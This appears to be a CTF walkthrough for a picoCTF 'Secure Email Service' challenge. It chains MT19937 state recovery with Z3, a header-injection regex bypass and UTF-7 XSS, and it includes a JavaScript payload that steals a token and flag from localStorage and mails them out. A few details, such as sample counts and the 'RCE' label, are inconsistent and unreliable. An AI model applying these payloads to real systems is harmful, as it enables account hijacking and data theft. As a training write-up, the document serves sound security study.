challenges April 1, 2026 20 min read

CTF Walkthrough: Secure Email Service

Platform: picoCTF 2025
Category: Web / Cryptography
Difficulty: Hard

TL;DR

We exploit three chained vulnerabilities:

Predict MIME boundaries via insecure RNG (MT19937)
Inject malicious headers via regex bypass (space before colon)
Execute XSS via UTF-7 encoding in signed emails

Result: Admin bot emails us the flag

Secure Email Service: Comprehensive Technical Deep Dive & Exploit Analysis

Introduction

Secure Email Service (aka "Activist Birds") is a hard web/crypto challenge. It's basically a microservices app mimicking a secure comms platform. It's got a FastAPI backend, some custom MIME handling in Python, Jinja2, and a headless Chrome bot (Playwright).

While the stack itself is standard, the way it's glued together creates some massive holes.

Figure 1: High-level architecture showing the flaw in the Trust Model where signed emails bypass safety checks.

The main issue here is Trust. The app makes three fatal assumptions:

Signed = Safe: It assumes if a message is signed, it's safe to render as HTML.
Random = Secure: It trusts Python's default RNG (random) for crypto-critical boundaries.
Regex = Firewall: It trusts a simple regex to filter headers, which is... optimistic.

We're going to break all three. We'll chain Insecure Randomness, Header Injection, and XSS (via UTF-7) to get RCE on the admin bot.

1. Component Analysis & Code Dissection

A. The Backend Logic (`main.py`)

main.py is where the logic lives. The really interesting part is how it handles email generation in /api/send.

The Vulnerable Endpoint: `/api/send`

It splits handling based on if you have keys or not.

Regular Users: No keys? You get the "sandbox" — plain text only. Safe.
Admins: Have keys? You get the "premium" treatment — signed HTML.

The bug is subtle but deadly: it trusts the Subject line.

@app.post('/api/send')
async def send(
    user: Annotated[User, Depends(db.request_user)],
    to: Annotated[str, Body()],
    subject: Annotated[str, Body()],
    body: Annotated[str, Body()]
):
    # 1. Recipient Validation
    # The system verifies if the target exists in the database.
    recipient = db.get_user(to)
    if not recipient:
        raise HTTPException(status_code=404, detail="Recipient not found")
    
    # 2. Privilege Check & Message Construction
    # The code branches here based on the cryptographic identity of the sender.
    
    # Scenario A: Regular User (Unsigned, Plaintext)
    # If the user lacks a public key, the system defaults to a safe, plaintext format.
    # This acts as a "Sandbox" for unprivileged users.
    if len(user.public_key) == 0:
        msg = util.generate_email(
            sender=user.username,
            recipient=recipient.username,
            subject=subject,
            content=body,
        )
    
    # Scenario B: Admin/Privileged User (Signed, HTML Rendered)
    # If the user possesses keys (like the Admin), the system enables dangerous features.
    # It assumes "Admin = Safe", a classic privilege fallacy.
    else:
        msg = util.generate_email(
            sender=user.username,
            recipient=recipient.username,
            subject=subject,
            content=template.render(
                title=subject,   # <--- THE ROOT CAUSE OF REFLECTION
                content=body
            ),
            html=True,        # Enables HTML rendering for the body
            sign=True,        # Applies cryptographic signature
            cert=user.public_key,
            key=user.private_key
        )

    # 3. Storage
    # The constructed MIME message is serialized to a string and stored.
    email_id = db.store_email(recipient.id, msg.as_string())
    return email_id

What's happening here?

Trust Dichotomy: It assumes "Signed = Safe HTML". This is a Signing Oracle. If we can trick the admin into signing our text, it becomes trusted HTML.
The Reflection: content=template.render(title=subject...). This is the kill shot. When an admin replies, the Subject of the original email (which we control) gets injected into the title variable. If we put garbage in the subject, it ends up in the admin's signed HTML body.

Figure 1a: The Trust Dichotomy and Reflection Point logic flaw.

The sketch above illustrates the critical logic flaw in main.py. The application splits its rendering logic based on privilege. Regular users are safely sandboxed in plaintext, but the Admin path (right side) trusts the content as HTML. The "Reflection Point" highlighted in the diagram shows where our malicious input (the Subject line) is injected directly into the Jinja2 template, bypassing the safety checks intended for the body content.

B. The Cryptographic Weakness (`util.py`)

This utility acts as a wrapper around Python's standard email library. While it seems functional and innocuous, it inherits a default behavior from the standard library that proves fatal for the system's security posture when used in a cryptographic or security-critical context.

import smail 
from email.mime.multipart import MIMEMultipart
# ...

def generate_email(sender, recipient, subject, content, html=False, sign=False, cert=None, key=None):
    # Initializes a multipart email container
    # Vulnerability: Uses default RNG for boundary generation without overrides
    msg = MIMEMultipart() 
    
    msg['From'] = sender
    msg['To'] = recipient
    msg['Subject'] = subject
    
    if html:
        msg.attach(MIMEText(content, 'html'))
    else:
        msg.attach(MIMEText(content, 'plain'))

    # ... S/MIME signing logic ...

Deep Analysis of util.py & Python's email Library:

MIME Structure & Boundaries: Multipart emails function by using a "boundary" string to separate different content types (e.g., multipart/alternative separating plaintext from HTML, or multipart/mixed for attachments). The structure dictates that the boundary must be unique enough not to appear in the content itself. The format generally looks like this:
```
Content-Type: multipart/mixed; boundary="===============123456789=="

--===============123456789==
Content-Type: text/plain

--===============123456789==--
```
If an attacker can predict this boundary, they can inject their own boundaries into the message body, confusing the parser into treating malicious payloads (like HTML scripts) as valid, separate MIME parts.
The Hidden RNG Call: When MIMEMultipart() is instantiated without a specific boundary argument, it calls the internal function email.generator._make_boundary(). This function, in turn, explicitly calls random.randrange(sys.maxsize) to create a unique identifier for the email boundary. This implicit behavior is often overlooked by developers who assume libraries handle security defaults correctly.
The Algorithm (MT19937): Python's random module relies on the Mersenne Twister (MT19937) Pseudo-Random Number Generator (PRNG). While MT19937 is excellent for Monte Carlo simulations due to its extremely long period ($2^{19937}-1$) and equidistribution properties, it is cryptographically insecure. It is purely deterministic. Its internal state consists of a vector of 624 32-bit integers. If an attacker recovers this state vector by observing enough outputs (in this case, 624 32-bit chunks), they can clone the generator and predict every future number it will produce with 100% accuracy. This predictability allows an attacker to know exactly what boundary string the admin bot will use before the bot even generates the email.

Figure 1b: The predictable boundary generation mechanism using an insecure RNG.

This diagram visualizes the supply chain of the email boundary. The function MIMEMultipart() implicitly relies on random.randrange() to generate the boundary string. As shown, an attacker can act as an observer, collecting these boundaries ('Boundary 1', 'Boundary 2') to reverse-engineer the internal state of the generator. Once the state is cloned, the attacker can predict future values ('Boundary 3') with perfect accuracy, breaking the uniqueness assumption the email parser relies on.

C. The Victim Simulation (`admin_bot.py`)

The bot is a Python script using Playwright to control a headless browser instance (Chromium). It simulates the admin's interaction with the web interface to process user emails. Analyzing this script reveals the precise "User Interaction" sequence required to trigger the XSS payload.

# Login Process
await page.goto('http://127.0.0.1:8000')
# Crucial: The flag is injected into the browser's LocalStorage here.
await page.evaluate('flag => localStorage.setItem("flag", flag)', flag)
# ... enters credentials ...

# Interaction Loop
# 1. Navigates to Inbox
# Networkidle ensures all API calls have finished loading.
await page.wait_for_url('http://127.0.0.1:8000/inbox.html', wait_until='networkidle')

# 2. Opens the FIRST email
# This predictable behavior allows us to "stack" the inbox.
await page.click('tbody tr', timeout=1000)

# 3. Clicks Reply
# This triggers the reflection vulnerability in main.py
await page.click('#reply button')

# 4. Sends Reply
await page.type('textarea', 'We\'ve gotten your message...')
await page.click('#reply button')

# 5. Cleanup
await browser.close()

Deep Analysis of admin_bot.py:

The "Kill Chain" Trigger: The bot predictably interacts with the top-most email in the inbox (tbody tr:first-child). This enables a "Heap Spray" style approach (in logic terms) where we can "stack the deck" by sending a malicious email right before triggering the bot via the API, ensuring our payload is processed immediately.
The Self-Reply Mechanism: When the bot clicks "Reply", the backend logic in main.py is triggered. Crucially, the "Reply" function automatically populates the recipient field using the sender address of the email being viewed. If the incoming email's From header says admin@ses, the bot (logged in as admin) effectively replies to itself. This circular logic is vital for the exploit: we need the admin to sign something and send it back to a place where the admin will read it again (the admin's own inbox).
Local Storage as the Vault: The script explicitly places the flag into localStorage. This confirms that our XSS payload must access localStorage to retrieve the loot (localStorage.getItem('flag')). This differs from traditional cookie theft and requires JavaScript execution within the origin's context.
Race Condition Potential: The script closes the browser immediately after sending the reply (await browser.close()). This creates a significant race condition for any asynchronous network requests (like standard fetch or XMLHttpRequest) we inject. If the browser closes before the request completes (TCP handshake + data transmission), the connection is severed, and we lose the exfiltrated data. This necessitates the use of keepalive: true, navigator.sendBeacon, or synchronous requests (async: false) in the final payload to force the browser to complete the transmission before termination.

Figure 2a: Visualizing the Admin Bot's predictable behavior loops and race condition risks.

Understanding the Admin Bot's Behavior (Figure 2a)

The diagram above illustrates the predictable cycle of the admin bot and the technical hurdles we must overcome:

Bot opens Inbox: The bot is programmed to always click the very first email in its inbox. This predictability is our "entry point"—we can ensure our malicious email is the one processed by sending it just seconds before triggering the bot.
Self-Reply Loop: This is the core of the reflection attack. By spoofing the From header to be admin@ses (using the space-before-colon trick), we trick the bot into replying to itself. This results in a new, signed email appearing at the top of the admin's inbox, which the bot will then open in its next run.
Execution: Once the bot opens the signed reply, our XSS payload (hidden via UTF-7) is rendered. Because the email is signed, the browser treats it as "safe" and executes the JavaScript. This script then reaches into localStorage where the flag is stored.
Race Condition: This is the final challenge. The bot script closes the browser almost immediately after sending its reply.
- Path A (Failure): A standard "Asynchronous" request (like a normal fetch) might be cut off before it can finish sending the flag.
- Path B (Success): By using a "Synchronous" request or specific flags like keepalive: true, we force the browser to stay open long enough to ensure the flag "escapes" to our server before the process terminates.

2. Vulnerability Analysis & Exploitation Theory

1. Cracking the Random Number Generator (The 64-bit Problem)

To inject a custom MIME structure into the email, we must ensure our injected body uses the exact same boundary string that the server generates for the header. If there is a mismatch between the header boundary and the body boundary, the email client will fail to parse the body correctly, rendering our payload inert. This requires predicting the output of random.randrange(sys.maxsize).

Architecture Context: The challenge runs on a 64-bit system. In Python 3 on 64-bit Linux, sys.maxsize is $2^{63}-1$ (approx. 9.22 quintillion).
MT19937 Limitations: The Mersenne Twister generates 32-bit numbers natively. It cannot produce a 64-bit integer in a single operation. This creates a complexity that standard 32-bit cracking tools (like the standard randcrack library) cannot handle out of the box.
Python's Generation Logic: To generate a 63-bit number (needed for sys.maxsize), Python's random module performs a specific sequence of operations:
- Generate 32 random bits ($A$) - These become the lower bits.
- Generate 32 random bits ($B$) - These become the upper bits.
- Shift $B$ left by 32 bits ($B \ll 32$).
- Combine them via bitwise OR: ($A | (B \ll 32)$).
Truncation: Since sys.maxsize ($2^{63}-1$) is a signed 64-bit integer (effectively 63 bits of magnitude), Python discards the most significant bit (MSB) of the resulting 64-bit number to ensure it remains positive.
The Recovery Challenge: Standard tools like randcrack expect contiguous, clean 32-bit outputs to reverse the tempering matrix. Here, we receive "polluted" 64-bit chunks where 1 bit (the MSB of the second 32-bit generation) is explicitly discarded/unknown. This loss of information breaks deterministic reversal algorithms.
The Z3 Fix

Calculated brute-force is too slow. We use Z3 (Microsoft's Theorem Prover).
We simulate the MT19937 state vector (624 32-bit integers) symbolically.
We tell Z3: "Here's a 64-bit output. It was made by taking two 32-bit chunks, shifting one, and combining them."
We feed it enough samples (about 320 emails) to constrain the solver.
Z3 solves the linear equations to find the original seed state.

Figure 2: Visualizing the 64-bit splitting technique to recover the 32-bit MT19937 internal state with Z3.

How we crack the 64-bit RNG (Figure 2)

The image above breaks down the process of turning semi-random server data back into a predictable sequence:

Split & Mask (The Input): We start with the 64-bit numbers we get from the server (boundary strings). As described earlier, Python makes these by gluing two 32-bit numbers together. We "Split" these back into their two original 32-bit halves. Crucially, the very first bit (the MSB) is marked with a '?' in the diagram because Python discards it.
Z3 Solver (The Brain): We feed these incomplete 32-bit chunks into the Z3 Solver. Instead of trying to guess the missing bits (which would take forever), Z3 treats the entire RNG process as a series of logic gates (represented by the AND, OR, and XOR symbols in the "Z3 Solver" box). It works backward through these gates to find the only possible numbers that could have created the outputs we saw.
Recovered State (The Vector): Once Z3 has enough samples, it fills in the 624 vector. This is the internal memory of the server's Mersenne Twister. With all 624 numbers recovered, we now have a perfect clone of the server's RNG.
Synchronization (The Result): The waves at the bottom represent us aligning our local generator with the server's generator. Once the "frequencies" match, we can predict every future boundary string with 100% accuracy, allowing us to build a payload that fits perfectly into the admin's next email.

2. Header Injection (Bypassing Regex Filters)

The application attempts to act as a firewall for email headers, preventing "Header Injection" (where an attacker adds newlines to overwrite headers like From or Content-Type) using a Regex filter. This is a common defense against spam relay attacks.

The Defense: re.compile(r'\n[^ \t]+:')
This regex matches a Newline character (\n), followed immediately by one or more non-whitespace characters ([^ \t]+), followed by a colon (:). It is designed to catch standard injection attempts like \nFrom: or \nCc:.
The Bypass: \nFrom : admin@ses
The Logic: By inserting a single space before the colon, the character sequence becomes: Newline -> F -> r -> o -> m -> Space -> Colon.
The Failure: The regex looks for [^ \t]+ (NOT space or tab). The space character fails this check, causing the regex match to fail entirely. The filter assumes valid headers must not have spaces before the colon.
The Parser: While the regex rejects From:, the Python email library parser follows Postel's Law (Robustness Principle: "be liberal in what you accept"). It explicitly allows whitespace before the colon in header fields per RFC standards (RFC 2822/5322), treating From : the same as From:. This leniency allows us to spoof the sender as admin@ses, setting the stage for the reflection attack.

3. XSS via UTF-7 (Bypassing Sanitization)

Modern browsers and CSPs (Content Security Policies) strictly block standard XSS vectors like <script>, javascript:, and inline event handlers. However, we can leverage legacy encoding support to smuggle our payload past filters.

The Vector: UTF-7 (7-bit Unicode Transformation Format) is an obsolete variable-width encoding that was designed for passing Unicode characters over ASCII-only mail gateways (SMTP).
The Mechanism: In UTF-7, special characters like < and > (which are essential for HTML tags) are encoded as ASCII sequences using + as an escape character.
- < becomes +ADw-
- > becomes +AD4-
- " becomes +ACI-
The Trigger: We inject the header Content-Type: text/html; charset=utf-7 via our header injection vulnerability. This instructs the rendering engine (the admin bot's browser) to decode the body using UTF-7 rules instead of standard UTF-8.
The Execution: A payload like +ADw-script+AD4- is rendered by the browser as <script>.
- Why it bypasses Jinja2: The Jinja2 template engine auto-escapes special HTML characters (like < and >) to prevent XSS. However, our UTF-7 payload consists entirely of safe ASCII characters (+, -, letters). Jinja2 sees nothing to escape and renders the string literally. The browser then performs the UTF-7 decoding after receiving the page, turning the safe ASCII back into executable HTML tags.

3. The Exploit Chain: Execution Protocol

Figure 3: The complete exploit flow.

Phase 1: State Recovery

Login: Get a session.
Spam: Send ~320 emails to yourself.
Extract: Get the boundary strings from those emails.
Solve: Feed the boundaries to Z3. Z3 gives us the RNG state.
Sync: Spin a local PRNG to match the server's state. Now we know the future.

Phase 2: Payload Construction (Engineering)

Figure 4: Detailed view of the low-level bypass techniques (Regex & UTF-7) and the Race Condition solution.

We need to inject a malicious MIME body into the Subject field because the subject is reflected into the email body. This requires solving multiple constraints simultaneously.

Constraint A: UTF-7 vs. Base64 Collision We need to execute complex JavaScript (fetch, localStorage, etc.). Using eval(atob('BASE64')) is standard to avoid character restrictions. However, Base64 encoding uses + and =. In UTF-7, + is an escape character. If our Base64 string contains +, the browser will try to decode the Base64 content as UTF-7, corrupting the script syntax.

Solution: We sanitize the Base64 string before injection.
- Replace + with +- (The UTF-7 escape sequence for a literal plus sign).
- Replace = with +AD0- (The UTF-7 encoded equals sign).

Constraint B: Boundary Collision (.0 Append) Python's email library is smart. If you manually set a boundary in the header, but that exact string appears in the email body (which we are injecting), it considers it a collision. To preserve structure, it appends .0 to the header boundary. This mismatch breaks our spoofed MIME structure.

Solution: We add a space before the boundary in our injected body: --===============.... The library's collision check regex (^--) expects the boundary at the absolute start of the line. The space bypasses this check. However, the receiving MIME parser ignores the indentation and accepts the boundary as valid.

Constraint C: The DOM Restriction (ShadowDOM) The email content is likely rendered inside a ShadowDOM using element.innerHTML = content. The HTML5 specification dictates that <script> tags inserted via innerHTML do not execute for security reasons.

Solution: We use <img src=x onerror=...>. The onerror event handler is not subject to the innerHTML restriction. It fires immediately upon the inevitable 404 error of loading the non-existent image "x", executing our payload.

Constraint D: Network Isolation (Egress Filtering) The bot runs in a Docker container that likely restricts outbound traffic via egress filtering. It cannot connect to external services like webhook.site.

Figure 5: Bypassing the firewall by forcing the bot to email the flag internally instead of connecting to the internet.

Solution: Internal Exfiltration. We force the bot: to make an API call to localhost (or the internal API gateway) to send an email to us (user@ses) containing the flag. We leverage the bot's own credentials (Token).

The Final Javascript Payload Logic:

// Example logic of the payload
var xhr = new XMLHttpRequest();
// Using Synchronous XHR (async: false) or keepalive to handle race conditions
// This ensures the browser waits for the network request to finish before closing.
xhr.open('POST', '/api/send', false); 

// Authenticating the request using the Admin's token found in localStorage.
// Without this header, the API would reject the request as Unauthorized (401).
xhr.setRequestHeader('Content-Type', 'application/json');
xhr.setRequestHeader('token', localStorage.getItem('token')); 

xhr.send(JSON.stringify({
    to: 'user@ses', // We send the loot to our own inbox
    subject: 'FLAG_DELIVERY',
    body: localStorage.getItem('flag') // The target data
}));

Phase 3: The Double Trigger (The Execution)

Injection: We send an email to admin@ses (spoofed) with the Header Injection payload in the Subject line. The payload contains the predicted future boundary and the UTF-7 encoded XSS vector.
Trigger 1 (Signing): We call /api/admin_bot.
- The bot logs in.
- It sees our email (appearing to be from admin@ses).
- It clicks "Reply".
- The backend generates a signed email, reflecting our malicious subject into the HTML body. It uses the boundary we predicted.
Wait: We pause for 5-10 seconds to allow the backend database to process and store this new signed email. This avoids race conditions where the bot checks the inbox before the reply is saved.
Trigger 2 (Execution): We call /api/admin_bot again.
- The bot logs in.
- It sees the Signed Reply (sent by itself in step 2) at the top of the inbox.
- It opens it. Since the email is signed, the system trusts it and renders it as HTML.
- The browser respects the charset=utf-7 header we injected.
- It executes the <img onerror> payload.
- The JavaScript creates a synchronous request to the internal API (or external webhook if available).
- The flag is emailed to user@ses.

4. Full Exploit Implementation

This script automates the full exploit chain to exfiltrate the flag. It leverages the Z3 solver to crack the server's PRNG, constructs a UTF-7 encoded XSS payload that bypasses Jinja2 escaping, and uses header injection to spoof the sender. By triggering the admin bot twice, we force the system to sign our payload and then execute it, sending the flag directly to our inbox.

Figure 5a: The logical flow of the Python exploit script.

How the Exploit Works

The flowchart above (Figure 5a) acts as a blueprint for the exploit. It shows exactly how the Python code moves from one step to the next to steal the flag. Here is a simple breakdown of the main phases:

1. Phase 1: Information Gathering (The "Math Magic" Phase)

Step 1 (login): The script logs in as a normal user to get a "session token" (like a temporary ID card).
Step 2 (The Loop): The script collects 624 "boundary" samples (the random ID numbers) by sending emails to itself.
Step 3 (Z3 Solver): It uses a smart math tool called Z3 to learn the secret "DNA" of the server's random number generator. This allows the script to recover the r2 State and predict any future random number.
Step 4 (Sync Check): The script verifies its predictions. If the math matches the server, it moves to the attack.

2. Phase 2: Setting the Trap (The Crafting Phase)

Step 5 (Craft Payload): The script calculates the future ID number the Admin will use. It then builds a "trap" email using UTF-7 (to hide code) and Header Injection (to fake its identity).
Step 6 (s.post): The script sends the trap email to the admin@ses.

3. Phase 3: The Attack (The "Double Trigger" Phase)

Step 7 (Trigger 1): The script tells the Admin Bot to check its mail. The bot sees our email, clicks "Reply," and the server Signs our hidden code with the Admin's official signature.
Step 8 (Wait): The script waits for 10 seconds to make sure the server has finished saving the new signed email.
Step 9 (Trigger 2): The script tells the Admin Bot to check its mail again. The bot opens its own reply. Because it is signed, the browser runs our hidden XSS code.

4. Final Result: The Loot

The hidden code sends the Flag from the Admin's browser to our exfiltration URL. You check your listener, and the flag is there!

Figure 6: Successful execution of the exploit script, recovering the flag from the admin bot.